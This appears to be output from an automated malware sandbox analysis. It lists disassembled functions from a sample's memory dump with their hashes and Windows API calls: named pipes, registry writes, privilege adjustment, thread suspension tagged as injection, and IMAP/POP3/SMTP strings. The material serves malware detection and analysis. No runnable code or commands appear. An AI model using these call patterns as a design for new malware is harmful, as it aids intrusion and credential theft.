    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DB47B, Relevance: 16.7, APIs: 11, Instructions: 187 Total matches: 59synchronizationstring
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBB92, Relevance: 15.1, APIs: 10, Instructions: 109 Total matches: 83pipesynchronization
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF75B, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 172 Total matches: 23string
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
